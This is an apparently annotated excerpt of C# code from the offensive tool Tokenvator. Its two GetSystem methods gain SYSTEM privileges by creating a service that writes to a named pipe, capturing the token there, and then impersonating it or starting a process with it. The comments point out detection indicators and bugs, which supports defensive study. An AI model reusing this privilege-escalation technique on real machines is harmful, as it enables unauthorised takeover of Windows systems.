////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Acquires a token through the hard-coded named pipe <c>\\.\pipe\Tokenvator</c> and then
/// launches <paramref name="command"/> with it. The pipe name, the "Tokenvator" name handed
/// to <c>PSExec</c>, and the literal service command line below are fixed strings that show
/// up on the host (service creation, pipe creation, process command line); all three are
/// usable as detection indicators.
/// </summary>
/// <param name="command">Executable passed through unchanged to the selected CreateProcess* routine.</param>
/// <param name="arguments">Argument string passed through unchanged.</param>
internal static void GetSystem(String command, String arguments)
{
    // Pipe listener. _GetPipeToken is defined elsewhere in the file; presumably it is
    // what sets the static hToken and signals waitHandle — confirm against its body.
    Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
    using (PSExec psExec = new PSExec("Tokenvator"))
    {
        psExec.Connect(".");   // "." presumably targets the local machine — verify in PSExec
        // Service command line: writes a fixed string into the pipe. This exact line is
        // recorded by service-install auditing, so it is a stable hunting artifact.
        psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        psExec.Open();
        // Ordering matters: the listener is started and the wait handle observed before
        // the service is started, so the pipe is presumably already listening by then.
        thread.Start();
        waitHandle.WaitOne();   // no timeout: if the listener never signals, this blocks forever — TODO confirm intended
        psExec.Start();
        psExec.Stop();
    }
    thread.Join();
    Create createProcess;
    // SessionId 0 (non-interactive session) selects CreateProcessWithLogonW; any other
    // session uses CreateProcessWithTokenW.
    if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
    {
        createProcess = CreateProcess.CreateProcessWithLogonW;
    }
    else
    {
        createProcess = CreateProcess.CreateProcessWithTokenW;
    }
    // NOTE(review): unlike the parameterless overload, hToken is neither checked against
    // IntPtr.Zero nor closed after use here, so a zero handle is passed straight through on
    // failure and a valid one leaks for the lifetime of the process.
    createProcess(hToken, command, arguments);
}
////////////////////////////////////////////////////////////////////////////////
////////////////////////////////////////////////////////////////////////////////
/// <summary>
/// Acquires a token through the hard-coded named pipe <c>\\.\pipe\Tokenvator</c> and, if one
/// was obtained, impersonates it on the calling thread and prints the resulting identity.
/// The pipe name, the "Tokenvator" name handed to <c>PSExec</c>, and the literal service
/// command line below are fixed strings observable on the host and usable as detection
/// indicators. Returns silently when no token was obtained.
/// </summary>
internal static void GetSystem()
{
    // Pipe listener. _GetPipeToken is defined elsewhere in the file; presumably it is
    // what sets the static hToken and signals waitHandle — confirm against its body.
    Thread thread = new Thread(() => _GetPipeToken(@"\\.\pipe\Tokenvator"));
    using (PSExec psExec = new PSExec("Tokenvator"))
    {
        psExec.Connect(".");   // "." presumably targets the local machine — verify in PSExec
        // Service command line: writes a fixed string into the pipe. This exact line is
        // recorded by service-install auditing, so it is a stable hunting artifact.
        psExec.Create("%COMSPEC% /c echo tokenvator > \\\\.\\pipe\\Tokenvator");
        psExec.Open();
        // Ordering matters: the listener is started and the wait handle observed before
        // the service is started, so the pipe is presumably already listening by then.
        thread.Start();
        waitHandle.WaitOne();   // no timeout: if the listener never signals, this blocks forever — TODO confirm intended
        psExec.Start();
        psExec.Stop();
    }
    thread.Join();
    if (IntPtr.Zero != hToken)
    {
        // Return value is not checked; the identity printed below is the only signal that
        // impersonation actually took effect.
        advapi32.ImpersonateLoggedOnUser(hToken);
        // The handle is closed right after impersonation and the static reset, so the
        // token is not reusable by later callers.
        kernel32.CloseHandle(hToken);
        Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
        hToken = IntPtr.Zero;
    }
}